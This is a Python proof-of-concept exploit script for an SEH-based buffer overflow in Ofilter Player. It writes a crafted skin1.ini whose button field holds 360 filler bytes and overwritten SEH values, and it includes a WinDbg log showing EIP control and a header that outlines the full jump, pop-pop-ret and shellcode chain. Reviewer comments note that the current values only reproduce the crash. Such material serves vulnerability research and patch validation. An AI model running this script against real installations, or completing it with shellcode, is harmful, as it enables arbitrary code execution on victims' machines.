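#!/usr/bin/python
# Exploit Title : Ofilter Player Version - (skin1.ini) - SEH Based Buffer Overflow PoC
# Date : 12-09-2013
# Exploit Author : gunslinger_
# Author Homepage : http://www.cr0security.com
# Software Link : http://download.cnet.com/Ofilter-Player/3000-2139_4-78232.html
# Price : Free to try; $19.99 to buy
# Version : (Probably old version of software and the LATEST version too)
# Vendor : DigitByte Studio
# Vendor Homepage : http://www.008soft.com/
# Tested on : Windows XP SP3
#============================================================================================
# Ofilter Player is prone to a SEH based Buffer Overflow which allows an attacker to execute arbitrary code on the victim's machine.
# To trigger the vulnerability the attacker must rewrite file skin1.ini inside /skin folder on Ofilter Player installed folder.
# Then run Ofilter Player, and EIP will be overwritten with the SEH address when the program initializes to read variable from skin1.ini file (see debug result below).
# The Exploit will look like this : [Junk "A" x 360] [6 Bytes Jump + 2Nops ] [pop pop ret address / others] [Shellcode] .
# Crash Triggered + Seh Overwritten .
#============================================================================================
#
# Review notes on this script:
# * The shebang was originally buried under the header comments, where the
#   loader never sees it; it is now the first line.
# * The original wrote a text ``str`` to a file opened in binary mode, which
#   only works on Python 2. The payload values are now ``bytes`` literals so
#   \xcc / \xbb land in the file as single raw bytes on Python 3 as well.
# * The two 4-byte values written into the SEH record (0xcccccccc and
#   0xbbbbbbbb) are deliberately invalid addresses: the script reproduces the
#   crash shown in the debugger log below and nothing more.
r'''
0:000> g
ModLoad: 773d0000 774d3000   C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll
ModLoad: 5ad70000 5ada8000   C:\WINDOWS\system32\uxtheme.dll
(658.3f0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000018c ebx=00000000 ecx=41414141 edx=0012df77 esi=00000171 edi=00000171
eip=0040161d esp=0012ddc4 ebp=0012df08 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** WARNING: Unable to verify checksum for image00400000
*** ERROR: Module load completed but symbols could not be loaded for image00400000
image00400000+0x161d:
0040161d 8b41f4          mov     eax,dword ptr [ecx-0Ch] ds:0023:41414135=????????
0:000> g
(658.3f0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=bbbbbbbb edx=7c9032bc esi=00000000 edi=00000000
eip=bbbbbbbb esp=0012d9f4 ebp=0012da14 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
bbbbbbbb ??              ???
0:000> !exchain
0012da08: ntdll!ExecuteHandler2+3a (7c9032bc)
0012df54: bbbbbbbb
Invalid exception stack at cccccccc
'''

from struct import pack  # kept from the original file; nothing in this script calls it

# Output file. The player reads it from its /skin folder, so the file is
# written to the current directory and must be copied there by hand.
filename = "skin1.ini"

# Crash-trigger layout (see the !exchain output above):
#   360 filler bytes, then the 4-byte "next SEH" slot, then the 4-byte handler.
junk = b"\x41" * 360            # "A" x 360, shows up as ecx=41414141 in the first fault
nextSEH = b"\xcc\xcc\xcc\xcc"   # nSEH slot, reported as "Invalid exception stack at cccccccc"
SEH = b"\xbb\xbb\xbb\xbb"       # handler slot, dispatched as eip=bbbbbbbb in the second fault
trigger_seh = junk + nextSEH + SEH

# NOTE(review): the second fault shows the overwritten handler being dispatched
# (eip=bbbbbbbb), which suggests the player binary lacks SafeSEH — confirm on
# the module before relying on SEH-based mitigations such as SEHOP/DEP.

# Bytes %-formatting keeps this runnable on both Python 2 and Python 3.5+.
# The operand is an explicit one-tuple so a second %s field would not break it.
ini_content = b"""[BACKGROUND]
Mask=GoldMask.bmp
Main=GoldMain.bmp
Selected=GoldSelected.bmp
Over=GoldOver.bmp
Disabled=GoldDisable.bmp
[BUTTON]
1=ID_FILE_EXIT,273,10,9,9,Exit,FALSE
2=ID_BUTTON_MINIMIZE,261,10,9,9,MINIMIZE,FALSE
3=IDC_BUTTON1_FILELIST_LOOP,229,85,42,21,FILE,FALSE
4=ID_JUMP_FORWARD,103,91,16,15,Skip Forward,FALSE
5=ID_PLAYBACK_NEXTCHAPTER,119,91,16,15,Next,FALSE
6=ID_PLAYBACK_PREVIOUSCHAPTER,23,91,16,15,Previous,FALSE
7=ID_PLAYBACK_STOP,86,91,17,15,Stop,FALSE
8=ID_PLAYBACK_PAUSE,71,91,15,15,Pause,FALSE
9=ID_PLAYBACK_PLAY,53,91,18,15,Play,FALSE
10=ID_JUMP_BACKWARD,38,91,15,15,Skip Backward,FALSE
11=ID_FILE_SELECTDISC,145,85,41,21,Open Media Files,FALSE
12=ID_WEBSITE,117,8,69,16,Website,FALSE
13=%s,186,85,42,21,Open VCD,FALSE
14=ID_POPUP_HELP,251,10,9,9,Popup,FALSE
[TRACKBARINFO]
1=IDC_SLIDER1_PLAYBACK_POSITION,Goldbutton1.bmp,Goldbutton1.bmp,23,69,247,6,H,100
2=IDC_SLIDER1_VOLUME,Goldbutton2.bmp,Goldbutton2.bmp,23,79,113,6,H,100
[PLAY]
1=ID_PLAYBACK_TIME,Arial,TRUE,TRUE,-14,32768,100,43,160,16,
2=PLAY,Arial,TRUE,TRUE,-14,32768,34,43,50,16,10""" % (trigger_seh,)

# Binary mode so the raw bytes and the "\n" line endings are written unchanged;
# the context manager closes the handle even if write() raises.
with open(filename, 'wb') as textfile:
    textfile.write(ini_content)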